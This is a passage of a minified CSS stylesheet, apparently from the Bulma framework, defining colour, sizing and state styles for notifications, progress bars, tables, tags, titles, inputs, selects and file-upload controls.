.title{color:currentColor}.notification.is-white{background-color:#fff;color:#0a0a0a}.notification.is-black{background-color:#0a0a0a;color:#fff}.notification.is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.notification.is-dark{background-color:#363636;color:#fff}.notification.is-primary{background-color:#00d1b2;color:#fff}.notification.is-primary.is-light{background-color:#ebfffc;color:#00947e}.notification.is-link{background-color:#3273dc;color:#fff}.notification.is-link.is-light{background-color:#eef3fc;color:#2160c4}.notification.is-info{background-color:#3298dc;color:#fff}.notification.is-info.is-light{background-color:#eef6fc;color:#1d72aa}.notification.is-success{background-color:#48c774;color:#fff}.notification.is-success.is-light{background-color:#effaf3;color:#257942}.notification.is-warning{background-color:#ffdd57;color:rgba(0,0,0,.7)}.notification.is-warning.is-light{background-color:#fffbeb;color:#947600}.notification.is-danger{background-color:#f14668;color:#fff}.notification.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.progress{-moz-appearance:none;-webkit-appearance:none;border:none;border-radius:290486px;display:block;height:1rem;overflow:hidden;padding:0;width:100%}.progress::-webkit-progress-bar{background-color:#ededed}.progress::-webkit-progress-value{background-color:#4a4a4a}.progress::-moz-progress-bar{background-color:#4a4a4a}.progress::-ms-fill{background-color:#4a4a4a;border:none}.progress.is-white::-webkit-progress-value{background-color:#fff}.progress.is-white::-moz-progress-bar{background-color:#fff}.progress.is-white::-ms-fill{background-color:#fff}.progress.is-white:indeterminate{background-image:linear-gradient(to right,#fff 30%,#ededed 30%)}.progress.is-black::-webkit-progress-value{background-color:#0a0a0a}.progress.is-black::-moz-progress-bar{background-color:#0a0a0a}.progress.is-black::-ms-fill{background-color:#0a0a0a}.progress.is-black:indeterminate{background-image:linear-gradient(to right,#0a0a0a 30%,#ededed 30%)}.progress.is-light::-webkit-progress-value{background-color:#f5f5f5}.progress.is-light::-moz-progress-bar{background-color:#f5f5f5}.progress.is-light::-ms-fill{background-color:#f5f5f5}.progress.is-light:indeterminate{background-image:linear-gradient(to right,#f5f5f5 30%,#ededed 30%)}.progress.is-dark::-webkit-progress-value{background-color:#363636}.progress.is-dark::-moz-progress-bar{background-color:#363636}.progress.is-dark::-ms-fill{background-color:#363636}.progress.is-dark:indeterminate{background-image:linear-gradient(to right,#363636 30%,#ededed 30%)}.progress.is-primary::-webkit-progress-value{background-color:#00d1b2}.progress.is-primary::-moz-progress-bar{background-color:#00d1b2}.progress.is-primary::-ms-fill{background-color:#00d1b2}.progress.is-primary:indeterminate{background-image:linear-gradient(to right,#00d1b2 30%,#ededed 30%)}.progress.is-link::-webkit-progress-value{background-color:#3273dc}.progress.is-link::-moz-progress-bar{background-color:#3273dc}.progress.is-link::-ms-fill{background-color:#3273dc}.progress.is-link:indeterminate{background-image:linear-gradient(to right,#3273dc 30%,#ededed 30%)}.progress.is-info::-webkit-progress-value{background-color:#3298dc}.progress.is-info::-moz-progress-bar{background-color:#3298dc}.progress.is-info::-ms-fill{background-color:#3298dc}.progress.is-info:indeterminate{background-image:linear-gradient(to right,#3298dc 30%,#ededed 30%)}.progress.is-success::-webkit-progress-value{background-color:#48c774}.progress.is-success::-moz-progress-bar{background-color:#48c774}.progress.is-success::-ms-fill{background-color:#48c774}.progress.is-success:indeterminate{background-image:linear-gradient(to right,#48c774 30%,#ededed 30%)}.progress.is-warning::-webkit-progress-value{background-color:#ffdd57}.progress.is-warning::-moz-progress-bar{background-color:#ffdd57}.progress.is-warning::-ms-fill{background-color:#ffdd57}.progress.is-warning:indeterminate{background-image:linear-gradient(to right,#ffdd57 30%,#ededed 30%)}.progress.is-danger::-webkit-progress-value{background-color:#f14668}.progress.is-danger::-moz-progress-bar{background-color:#f14668}.progress.is-danger::-ms-fill{background-color:#f14668}.progress.is-danger:indeterminate{background-image:linear-gradient(to right,#f14668 30%,#ededed 30%)}.progress:indeterminate{-webkit-animation-duration:1.5s;animation-duration:1.5s;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite;-webkit-animation-name:moveIndeterminate;animation-name:moveIndeterminate;-webkit-animation-timing-function:linear;animation-timing-function:linear;background-color:#ededed;background-image:linear-gradient(to right,#4a4a4a 30%,#ededed 30%);background-position:top left;background-repeat:no-repeat;background-size:150% 150%}.progress:indeterminate::-webkit-progress-bar{background-color:transparent}.progress:indeterminate::-moz-progress-bar{background-color:transparent}.progress.is-small{height:.75rem}.progress.is-medium{height:1.25rem}.progress.is-large{height:1.5rem}@-webkit-keyframes moveIndeterminate{from{background-position:200% 0}to{background-position:-200% 0}}@keyframes moveIndeterminate{from{background-position:200% 0}to{background-position:-200% 0}}.table{background-color:#fff;color:#363636}.table td,.table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.table td.is-white,.table th.is-white{background-color:#fff;border-color:#fff;color:#0a0a0a}.table td.is-black,.table th.is-black{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.table td.is-light,.table th.is-light{background-color:#f5f5f5;border-color:#f5f5f5;color:rgba(0,0,0,.7)}.table td.is-dark,.table th.is-dark{background-color:#363636;border-color:#363636;color:#fff}.table td.is-primary,.table th.is-primary{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.table td.is-link,.table th.is-link{background-color:#3273dc;border-color:#3273dc;color:#fff}.table td.is-info,.table th.is-info{background-color:#3298dc;border-color:#3298dc;color:#fff}.table td.is-success,.table th.is-success{background-color:#48c774;border-color:#48c774;color:#fff}.table td.is-warning,.table th.is-warning{background-color:#ffdd57;border-color:#ffdd57;color:rgba(0,0,0,.7)}.table td.is-danger,.table th.is-danger{background-color:#f14668;border-color:#f14668;color:#fff}.table td.is-narrow,.table th.is-narrow{white-space:nowrap;width:1%}.table td.is-selected,.table th.is-selected{background-color:#00d1b2;color:#fff}.table td.is-selected a,.table td.is-selected strong,.table th.is-selected a,.table th.is-selected strong{color:currentColor}.table th{color:#363636}.table th:not([align]){text-align:left}.table tr.is-selected{background-color:#00d1b2;color:#fff}.table tr.is-selected a,.table tr.is-selected strong{color:currentColor}.table tr.is-selected td,.table tr.is-selected th{border-color:#fff;color:currentColor}.table thead{background-color:transparent}.table thead td,.table thead th{border-width:0 0 2px;color:#363636}.table tfoot{background-color:transparent}.table tfoot td,.table tfoot th{border-width:2px 0 0;color:#363636}.table tbody{background-color:transparent}.table tbody tr:last-child td,.table tbody tr:last-child th{border-bottom-width:0}.table.is-bordered td,.table.is-bordered th{border-width:1px}.table.is-bordered tr:last-child td,.table.is-bordered tr:last-child th{border-bottom-width:1px}.table.is-fullwidth{width:100%}.table.is-hoverable tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover:nth-child(even){background-color:#f5f5f5}.table.is-narrow td,.table.is-narrow th{padding:.25em .5em}.table.is-striped tbody tr:not(.is-selected):nth-child(even){background-color:#fafafa}.table-container{-webkit-overflow-scrolling:touch;overflow:auto;overflow-y:hidden;max-width:100%}.tags{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.tags .tag{margin-bottom:.5rem}.tags .tag:not(:last-child){margin-right:.5rem}.tags:last-child{margin-bottom:-.5rem}.tags:not(:last-child){margin-bottom:1rem}.tags.are-medium .tag:not(.is-normal):not(.is-large){font-size:1rem}.tags.are-large .tag:not(.is-normal):not(.is-medium){font-size:1.25rem}.tags.is-centered{justify-content:center}.tags.is-centered .tag{margin-right:.25rem;margin-left:.25rem}.tags.is-right{justify-content:flex-end}.tags.is-right .tag:not(:first-child){margin-left:.5rem}.tags.is-right .tag:not(:last-child){margin-right:0}.tags.has-addons .tag{margin-right:0}.tags.has-addons .tag:not(:first-child){margin-left:0;border-bottom-left-radius:0;border-top-left-radius:0}.tags.has-addons .tag:not(:last-child){border-bottom-right-radius:0;border-top-right-radius:0}.tag:not(body){align-items:center;background-color:#f5f5f5;border-radius:4px;color:#4a4a4a;display:inline-flex;font-size:.75rem;height:2em;justify-content:center;line-height:1.5;padding-left:.75em;padding-right:.75em;white-space:nowrap}.tag:not(body) .delete{margin-left:.25rem;margin-right:-.375rem}.tag:not(body).is-white{background-color:#fff;color:#0a0a0a}.tag:not(body).is-black{background-color:#0a0a0a;color:#fff}.tag:not(body).is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.tag:not(body).is-dark{background-color:#363636;color:#fff}.tag:not(body).is-primary{background-color:#00d1b2;color:#fff}.tag:not(body).is-primary.is-light{background-color:#ebfffc;color:#00947e}.tag:not(body).is-link{background-color:#3273dc;color:#fff}.tag:not(body).is-link.is-light{background-color:#eef3fc;color:#2160c4}.tag:not(body).is-info{background-color:#3298dc;color:#fff}.tag:not(body).is-info.is-light{background-color:#eef6fc;color:#1d72aa}.tag:not(body).is-success{background-color:#48c774;color:#fff}.tag:not(body).is-success.is-light{background-color:#effaf3;color:#257942}.tag:not(body).is-warning{background-color:#ffdd57;color:rgba(0,0,0,.7)}.tag:not(body).is-warning.is-light{background-color:#fffbeb;color:#947600}.tag:not(body).is-danger{background-color:#f14668;color:#fff}.tag:not(body).is-danger.is-light{background-color:#feecf0;color:#cc0f35}.tag:not(body).is-normal{font-size:.75rem}.tag:not(body).is-medium{font-size:1rem}.tag:not(body).is-large{font-size:1.25rem}.tag:not(body) .icon:first-child:not(:last-child){margin-left:-.375em;margin-right:.1875em}.tag:not(body) .icon:last-child:not(:first-child){margin-left:.1875em;margin-right:-.375em}.tag:not(body) .icon:first-child:last-child{margin-left:-.375em;margin-right:-.375em}.tag:not(body).is-delete{margin-left:1px;padding:0;position:relative;width:2em}.tag:not(body).is-delete::after,.tag:not(body).is-delete::before{background-color:currentColor;content:"";display:block;left:50%;position:absolute;top:50%;transform:translateX(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.tag:not(body).is-delete::before{height:1px;width:50%}.tag:not(body).is-delete::after{height:50%;width:1px}.tag:not(body).is-delete:focus,.tag:not(body).is-delete:hover{background-color:#e8e8e8}.tag:not(body).is-delete:active{background-color:#dbdbdb}.tag:not(body).is-rounded{border-radius:290486px}a.tag:hover{text-decoration:underline}.subtitle,.title{word-break:break-word}.subtitle em,.subtitle span,.title em,.title span{font-weight:inherit}.subtitle sub,.title sub{font-size:.75em}.subtitle sup,.title sup{font-size:.75em}.subtitle .tag,.title .tag{vertical-align:middle}.title{color:#363636;font-size:2rem;font-weight:600;line-height:1.125}.title strong{color:inherit;font-weight:inherit}.title+.highlight{margin-top:-.75rem}.title:not(.is-spaced)+.subtitle{margin-top:-1.25rem}.title.is-1{font-size:3rem}.title.is-2{font-size:2.5rem}.title.is-3{font-size:2rem}.title.is-4{font-size:1.5rem}.title.is-5{font-size:1.25rem}.title.is-6{font-size:1rem}.title.is-7{font-size:.75rem}.subtitle{color:#4a4a4a;font-size:1.25rem;font-weight:400;line-height:1.25}.subtitle strong{color:#363636;font-weight:600}.subtitle:not(.is-spaced)+.title{margin-top:-1.25rem}.subtitle.is-1{font-size:3rem}.subtitle.is-2{font-size:2.5rem}.subtitle.is-3{font-size:2rem}.subtitle.is-4{font-size:1.5rem}.subtitle.is-5{font-size:1.25rem}.subtitle.is-6{font-size:1rem}.subtitle.is-7{font-size:.75rem}.heading{display:block;font-size:11px;letter-spacing:1px;margin-bottom:5px;text-transform:uppercase}.highlight{font-weight:400;max-width:100%;overflow:hidden;padding:0}.highlight pre{overflow:auto;max-width:100%}.number{align-items:center;background-color:#f5f5f5;border-radius:290486px;display:inline-flex;font-size:1.25rem;height:2em;justify-content:center;margin-right:1.5rem;min-width:2.5em;padding:.25rem .5rem;text-align:center;vertical-align:top}.input,.select select,.textarea{background-color:#fff;border-color:#dbdbdb;border-radius:4px;color:#363636}.input::-moz-placeholder,.select select::-moz-placeholder,.textarea::-moz-placeholder{color:rgba(54,54,54,.3)}.input::-webkit-input-placeholder,.select select::-webkit-input-placeholder,.textarea::-webkit-input-placeholder{color:rgba(54,54,54,.3)}.input:-moz-placeholder,.select select:-moz-placeholder,.textarea:-moz-placeholder{color:rgba(54,54,54,.3)}.input:-ms-input-placeholder,.select select:-ms-input-placeholder,.textarea:-ms-input-placeholder{color:rgba(54,54,54,.3)}.input:hover,.is-hovered.input,.is-hovered.textarea,.select select.is-hovered,.select select:hover,.textarea:hover{border-color:#b5b5b5}.input:active,.input:focus,.is-active.input,.is-active.textarea,.is-focused.input,.is-focused.textarea,.select select.is-active,.select select.is-focused,.select select:active,.select select:focus,.textarea:active,.textarea:focus{border-color:#3273dc;box-shadow:0 0 0 .125em rgba(50,115,220,.25)}.input[disabled],.select fieldset[disabled] select,.select select[disabled],.textarea[disabled],fieldset[disabled] .input,fieldset[disabled] .select select,fieldset[disabled] .textarea{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none;color:#7a7a7a}.input[disabled]::-moz-placeholder,.select fieldset[disabled] select::-moz-placeholder,.select select[disabled]::-moz-placeholder,.textarea[disabled]::-moz-placeholder,fieldset[disabled] .input::-moz-placeholder,fieldset[disabled] .select select::-moz-placeholder,fieldset[disabled] .textarea::-moz-placeholder{color:rgba(122,122,122,.3)}.input[disabled]::-webkit-input-placeholder,.select fieldset[disabled] select::-webkit-input-placeholder,.select select[disabled]::-webkit-input-placeholder,.textarea[disabled]::-webkit-input-placeholder,fieldset[disabled] .input::-webkit-input-placeholder,fieldset[disabled] .select select::-webkit-input-placeholder,fieldset[disabled] .textarea::-webkit-input-placeholder{color:rgba(122,122,122,.3)}.input[disabled]:-moz-placeholder,.select fieldset[disabled] select:-moz-placeholder,.select select[disabled]:-moz-placeholder,.textarea[disabled]:-moz-placeholder,fieldset[disabled] .input:-moz-placeholder,fieldset[disabled] .select select:-moz-placeholder,fieldset[disabled] .textarea:-moz-placeholder{color:rgba(122,122,122,.3)}.input[disabled]:-ms-input-placeholder,.select fieldset[disabled] select:-ms-input-placeholder,.select select[disabled]:-ms-input-placeholder,.textarea[disabled]:-ms-input-placeholder,fieldset[disabled] .input:-ms-input-placeholder,fieldset[disabled] .select select:-ms-input-placeholder,fieldset[disabled] .textarea:-ms-input-placeholder{color:rgba(122,122,122,.3)}.input,.textarea{box-shadow:inset 0 .0625em .125em rgba(10,10,10,.05);max-width:100%;width:100%}.input[readonly],.textarea[readonly]{box-shadow:none}.is-white.input,.is-white.textarea{border-color:#fff}.is-white.input:active,.is-white.input:focus,.is-white.is-active.input,.is-white.is-active.textarea,.is-white.is-focused.input,.is-white.is-focused.textarea,.is-white.textarea:active,.is-white.textarea:focus{box-shadow:0 0 0 .125em rgba(255,255,255,.25)}.is-black.input,.is-black.textarea{border-color:#0a0a0a}.is-black.input:active,.is-black.input:focus,.is-black.is-active.input,.is-black.is-active.textarea,.is-black.is-focused.input,.is-black.is-focused.textarea,.is-black.textarea:active,.is-black.textarea:focus{box-shadow:0 0 0 .125em rgba(10,10,10,.25)}.is-light.input,.is-light.textarea{border-color:#f5f5f5}.is-light.input:active,.is-light.input:focus,.is-light.is-active.input,.is-light.is-active.textarea,.is-light.is-focused.input,.is-light.is-focused.textarea,.is-light.textarea:active,.is-light.textarea:focus{box-shadow:0 0 0 .125em rgba(245,245,245,.25)}.is-dark.input,.is-dark.textarea{border-color:#363636}.is-dark.input:active,.is-dark.input:focus,.is-dark.is-active.input,.is-dark.is-active.textarea,.is-dark.is-focused.input,.is-dark.is-focused.textarea,.is-dark.textarea:active,.is-dark.textarea:focus{box-shadow:0 0 0 .125em rgba(54,54,54,.25)}.is-primary.input,.is-primary.textarea{border-color:#00d1b2}.is-primary.input:active,.is-primary.input:focus,.is-primary.is-active.input,.is-primary.is-active.textarea,.is-primary.is-focused.input,.is-primary.is-focused.textarea,.is-primary.textarea:active,.is-primary.textarea:focus{box-shadow:0 0 0 .125em rgba(0,209,178,.25)}.is-link.input,.is-link.textarea{border-color:#3273dc}.is-link.input:active,.is-link.input:focus,.is-link.is-active.input,.is-link.is-active.textarea,.is-link.is-focused.input,.is-link.is-focused.textarea,.is-link.textarea:active,.is-link.textarea:focus{box-shadow:0 0 0 .125em rgba(50,115,220,.25)}.is-info.input,.is-info.textarea{border-color:#3298dc}.is-info.input:active,.is-info.input:focus,.is-info.is-active.input,.is-info.is-active.textarea,.is-info.is-focused.input,.is-info.is-focused.textarea,.is-info.textarea:active,.is-info.textarea:focus{box-shadow:0 0 0 .125em rgba(50,152,220,.25)}.is-success.input,.is-success.textarea{border-color:#48c774}.is-success.input:active,.is-success.input:focus,.is-success.is-active.input,.is-success.is-active.textarea,.is-success.is-focused.input,.is-success.is-focused.textarea,.is-success.textarea:active,.is-success.textarea:focus{box-shadow:0 0 0 .125em rgba(72,199,116,.25)}.is-warning.input,.is-warning.textarea{border-color:#ffdd57}.is-warning.input:active,.is-warning.input:focus,.is-warning.is-active.input,.is-warning.is-active.textarea,.is-warning.is-focused.input,.is-warning.is-focused.textarea,.is-warning.textarea:active,.is-warning.textarea:focus{box-shadow:0 0 0 .125em rgba(255,221,87,.25)}.is-danger.input,.is-danger.textarea{border-color:#f14668}.is-danger.input:active,.is-danger.input:focus,.is-danger.is-active.input,.is-danger.is-active.textarea,.is-danger.is-focused.input,.is-danger.is-focused.textarea,.is-danger.textarea:active,.is-danger.textarea:focus{box-shadow:0 0 0 .125em rgba(241,70,104,.25)}.is-small.input,.is-small.textarea{border-radius:2px;font-size:.75rem}.is-medium.input,.is-medium.textarea{font-size:1.25rem}.is-large.input,.is-large.textarea{font-size:1.5rem}.is-fullwidth.input,.is-fullwidth.textarea{display:block;width:100%}.is-inline.input,.is-inline.textarea{display:inline;width:auto}.input.is-rounded{border-radius:290486px;padding-left:calc(calc(.75em - 1px) + .375em);padding-right:calc(calc(.75em - 1px) + .375em)}.input.is-static{background-color:transparent;border-color:transparent;box-shadow:none;padding-left:0;padding-right:0}.textarea{display:block;max-width:100%;min-width:100%;padding:calc(.75em - 1px);resize:vertical}.textarea:not([rows]){max-height:40em;min-height:8em}.textarea[rows]{height:initial}.textarea.has-fixed-size{resize:none}.checkbox,.radio{cursor:pointer;display:inline-block;line-height:1.25;position:relative}.checkbox input,.radio input{cursor:pointer}.checkbox:hover,.radio:hover{color:#363636}.checkbox[disabled],.radio[disabled],fieldset[disabled] .checkbox,fieldset[disabled] .radio{color:#7a7a7a;cursor:not-allowed}.radio+.radio{margin-left:.5em}.select{display:inline-block;max-width:100%;position:relative;vertical-align:top}.select:not(.is-multiple){height:2.5em}.select:not(.is-multiple):not(.is-loading)::after{border-color:#3273dc;right:1.125em;z-index:4}.select.is-rounded select{border-radius:290486px;padding-left:1em}.select select{cursor:pointer;display:block;font-size:1em;max-width:100%;outline:0}.select select::-ms-expand{display:none}.select select[disabled]:hover,fieldset[disabled] .select select:hover{border-color:#f5f5f5}.select select:not([multiple]){padding-right:2.5em}.select select[multiple]{height:auto;padding:0}.select select[multiple] option{padding:.5em 1em}.select:not(.is-multiple):not(.is-loading):hover::after{border-color:#363636}.select.is-white:not(:hover)::after{border-color:#fff}.select.is-white select{border-color:#fff}.select.is-white select.is-hovered,.select.is-white select:hover{border-color:#f2f2f2}.select.is-white select.is-active,.select.is-white select.is-focused,.select.is-white select:active,.select.is-white select:focus{box-shadow:0 0 0 .125em rgba(255,255,255,.25)}.select.is-black:not(:hover)::after{border-color:#0a0a0a}.select.is-black select{border-color:#0a0a0a}.select.is-black select.is-hovered,.select.is-black select:hover{border-color:#000}.select.is-black select.is-active,.select.is-black select.is-focused,.select.is-black select:active,.select.is-black select:focus{box-shadow:0 0 0 .125em rgba(10,10,10,.25)}.select.is-light:not(:hover)::after{border-color:#f5f5f5}.select.is-light select{border-color:#f5f5f5}.select.is-light select.is-hovered,.select.is-light select:hover{border-color:#e8e8e8}.select.is-light select.is-active,.select.is-light select.is-focused,.select.is-light select:active,.select.is-light select:focus{box-shadow:0 0 0 .125em rgba(245,245,245,.25)}.select.is-dark:not(:hover)::after{border-color:#363636}.select.is-dark select{border-color:#363636}.select.is-dark select.is-hovered,.select.is-dark select:hover{border-color:#292929}.select.is-dark select.is-active,.select.is-dark select.is-focused,.select.is-dark select:active,.select.is-dark select:focus{box-shadow:0 0 0 .125em rgba(54,54,54,.25)}.select.is-primary:not(:hover)::after{border-color:#00d1b2}.select.is-primary select{border-color:#00d1b2}.select.is-primary select.is-hovered,.select.is-primary select:hover{border-color:#00b89c}.select.is-primary select.is-active,.select.is-primary select.is-focused,.select.is-primary select:active,.select.is-primary select:focus{box-shadow:0 0 0 .125em rgba(0,209,178,.25)}.select.is-link:not(:hover)::after{border-color:#3273dc}.select.is-link select{border-color:#3273dc}.select.is-link select.is-hovered,.select.is-link select:hover{border-color:#2366d1}.select.is-link select.is-active,.select.is-link select.is-focused,.select.is-link select:active,.select.is-link select:focus{box-shadow:0 0 0 .125em rgba(50,115,220,.25)}.select.is-info:not(:hover)::after{border-color:#3298dc}.select.is-info select{border-color:#3298dc}.select.is-info select.is-hovered,.select.is-info select:hover{border-color:#238cd1}.select.is-info select.is-active,.select.is-info select.is-focused,.select.is-info select:active,.select.is-info select:focus{box-shadow:0 0 0 .125em rgba(50,152,220,.25)}.select.is-success:not(:hover)::after{border-color:#48c774}.select.is-success select{border-color:#48c774}.select.is-success select.is-hovered,.select.is-success select:hover{border-color:#3abb67}.select.is-success select.is-active,.select.is-success select.is-focused,.select.is-success select:active,.select.is-success select:focus{box-shadow:0 0 0 .125em rgba(72,199,116,.25)}.select.is-warning:not(:hover)::after{border-color:#ffdd57}.select.is-warning select{border-color:#ffdd57}.select.is-warning select.is-hovered,.select.is-warning select:hover{border-color:#ffd83d}.select.is-warning select.is-active,.select.is-warning select.is-focused,.select.is-warning select:active,.select.is-warning select:focus{box-shadow:0 0 0 .125em rgba(255,221,87,.25)}.select.is-danger:not(:hover)::after{border-color:#f14668}.select.is-danger select{border-color:#f14668}.select.is-danger select.is-hovered,.select.is-danger select:hover{border-color:#ef2e55}.select.is-danger select.is-active,.select.is-danger select.is-focused,.select.is-danger select:active,.select.is-danger select:focus{box-shadow:0 0 0 .125em rgba(241,70,104,.25)}.select.is-small{border-radius:2px;font-size:.75rem}.select.is-medium{font-size:1.25rem}.select.is-large{font-size:1.5rem}.select.is-disabled::after{border-color:#7a7a7a}.select.is-fullwidth{width:100%}.select.is-fullwidth select{width:100%}.select.is-loading::after{margin-top:0;position:absolute;right:.625em;top:.625em;transform:none}.select.is-loading.is-small:after{font-size:.75rem}.select.is-loading.is-medium:after{font-size:1.25rem}.select.is-loading.is-large:after{font-size:1.5rem}.file{align-items:stretch;display:flex;justify-content:flex-start;position:relative}.file.is-white .file-cta{background-color:#fff;border-color:transparent;color:#0a0a0a}.file.is-white.is-hovered .file-cta,.file.is-white:hover .file-cta{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.file.is-white.is-focused .file-cta,.file.is-white:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(255,255,255,.25);color:#0a0a0a}.file.is-white.is-active .file-cta,.file.is-white:active .file-cta{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.file.is-black .file-cta{background-color:#0a0a0a;border-color:transparent;color:#fff}.file.is-black.is-hovered .file-cta,.file.is-black:hover .file-cta{background-color:#040404;border-color:transparent;color:#fff}.file.is-black.is-focused .file-cta,.file.is-black:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(10,10,10,.25);color:#fff}.file.is-black.is-active .file-cta,.file.is-black:active .file-cta{background-color:#000;border-color:transparent;color:#fff}.file.is-light .file-cta{background-color:#f5f5f5;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-light.is-hovered .file-cta,.file.is-light:hover .file-cta{background-color:#eee;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-light.is-focused .file-cta,.file.is-light:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(245,245,245,.25);color:rgba(0,0,0,.7)}.file.is-light.is-active .file-cta,.file.is-light:active .file-cta{background-color:#e8e8e8;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-dark .file-cta{background-color:#363636;border-color:transparent;color:#fff}.file.is-dark.is-hovered .file-cta,.file.is-dark:hover .file-cta{background-color:#2f2f2f;border-color:transparent;color:#fff}.file.is-dark.is-focused .file-cta,.file.is-dark:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(54,54,54,.25);color:#fff}.file.is-dark.is-active .file-cta,.file.is-dark:active .file-cta{background-color:#292929;border-color:transparent;color:#fff}.file.is-primary .file-cta{background-color:#00d1b2;border-color:transparent;color:#fff}.file.is-primary.is-hovered .file-cta,.file.is-primary:hover .file-cta{background-color:#00c4a7;border-color:transparent;color:#fff}.file.is-primary.is-focused .file-cta,.file.is-primary:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(0,209,178,.25);color:#fff}.file.is-primary.is-active .file-cta,.file.is-primary:active .file-cta{background-color:#00b89c;border-color:transparent;color:#fff}.file.is-link .file-cta{background-color:#3273dc;border-color:transparent;color:#fff}.file.is-link.is-hovered .file-cta,.file.is-link:hover .file-cta{background-color:#276cda;border-color:transparent;color:#fff}.file.is-link.is-focused .file-cta,.file.is-link:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(50,115,220,.25);color:#fff}.file.is-link.is-active .file-cta,.file.is-link:active .file-cta{background-color:#2366d1;border-color:transparent;color:#fff}.file.is-info .file-cta{background-color:#3298dc;border-color:transparent;color:#fff}.file.is-info.is-hovered .file-cta,.file.is-info:hover .file-cta{background-color:#2793da;border-color:transparent;color:#fff}.file.is-info.is-focused .file-cta,.file.is-info:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(50,152,220,.25);color:#fff}.file.is-info.is-active .file-cta,.file.is-info:active .file-cta{background-color:#238cd1;border-color:transparent;color:#fff}.file.is-success .file-cta{background-color:#48c774;border-color:transparent;color:#fff}.file.is-success.is-hovered .file-cta,.file.is-success:hover .file-cta{background-color:#3ec46d;border-color:transparent;color:#fff}.file.is-success.is-focused .file-cta,.file.is-success:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(72,199,116,.25);color:#fff}.file.is-success.is-active .file-cta,.file.is-success:active .file-cta{background-color:#3abb67;border-color:transparent;color:#fff}.file.is-warning .file-cta{background-color:#ffdd57;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-warning.is-hovered .file-cta,.file.is-warning:hover .file-cta{background-color:#ffdb4a;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-warning.is-focused .file-cta,.file.is-warning:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(255,221,87,.25);color:rgba(0,0,0,.7)}.file.is-warning.is-active .file-cta,.file.is-warning:active .file-cta{background-color:#ffd83d;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-danger .file-cta{background-color:#f14668;border-color:transparent;color:#fff}.file.is-danger.is-hovered .file-cta,.file.is-danger:hover .file-cta{background-color:#f03a5f;border-color:transparent;color:#fff}.file.is-danger.is-focused .file-cta,.file.is-danger:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(241,70,104,.25);color:#fff}.file.is-danger.is-active .file-cta,.file.is-danger:active .file-cta{background-color:#ef2e55;border-color:transparent;color:#fff}.file.is-small{font-size:.75rem}.file.is-medium{font-size:1.25rem}.file.is-medium .file-icon .fa{font-size:21px}.file.is-large{font-size:1.5rem}.file.is-large .file-icon .fa{font-size:28px}.file.has-name .file-cta{border-bottom-right-radius:0;border-top-right-radius:0}.file.has-name .file-name{border-bottom-left-radius:0;border-top-left-radius:0}.file.has-name.is-empty .file-cta{border-radius:4px}.file.has-name.is-empty .file-name{display:none}.file.is-boxed .file-label{flex-direction:column}.file.is-boxed .file-cta{flex-direction:column;height:auto;padding:1em 3em}.file.is-boxed .file-name{border-width:0 1px 1px}.file.is-boxed .file-icon{height:1.5em;width:1.5em}.file.is-boxed .file-icon .fa{font-size:21px}.file.is-boxed.is-small .file-icon .fa{font-size:14px}.file.is-boxed.is-medium .file-icon .fa{font-size:28px}.file.is-boxed.is-large .file-icon .fa{font-size:35px}.file.is-boxed.has-name .file-cta{border-radius:4px 4px 0 0}.file.is-boxed.has-name .file-name{border-radius:0 0 4px 4px;border-width:0 1px 1px}.file.is-centered{justify-content:center}.file.is-fullwidth .file-label{width:100%}.file.is-fullwidth .file-name{flex-grow:1;max-width:none}.file.is-right{justify-content:flex-end}.file.is-right .file-cta{border-radius:0 4px 4px 0}.file.is-right .file-name{border-radius:4px 0 0 4px;border-width:1px 0 1px 1px;order:-1}.file-label{align-items:stretch;display:flex;cursor:pointer;justify-content:flex-start;overflow:hidden;position:relative}.file-label:hover .file-cta{background-color:#eee;color:#363636}.file-label:hover .file-name{border-color:#d5d5d5}.file-label:active .file-cta{background-color:#e8e8e8;color:#363636}.file-label:active .file-name{border-color:#cfcfcf}.file-input{height:100%;left:0;opacity:0;outline:0;position:absolute;top:0;width:100%}.file-cta,.file-name{border-color:#dbdbdb;border-radius:4px;font-size:1em;padding-left:1em;padding-right:1em;white-space:nowrap}.file-cta{background-color:#f5f5f5;color:#4a4a4a}.file-name{border-color:#dbdbdb;border-style:solid;border-width:1px 1px 1px 0;display:block;max-width:16em;overflow:hidden;text-align:left;text-overflow:ellipsis}.file-icon{align-items:center;display:flex;height:1em;justify-content:center;margin-right:.5em;width:1em}.file-icon 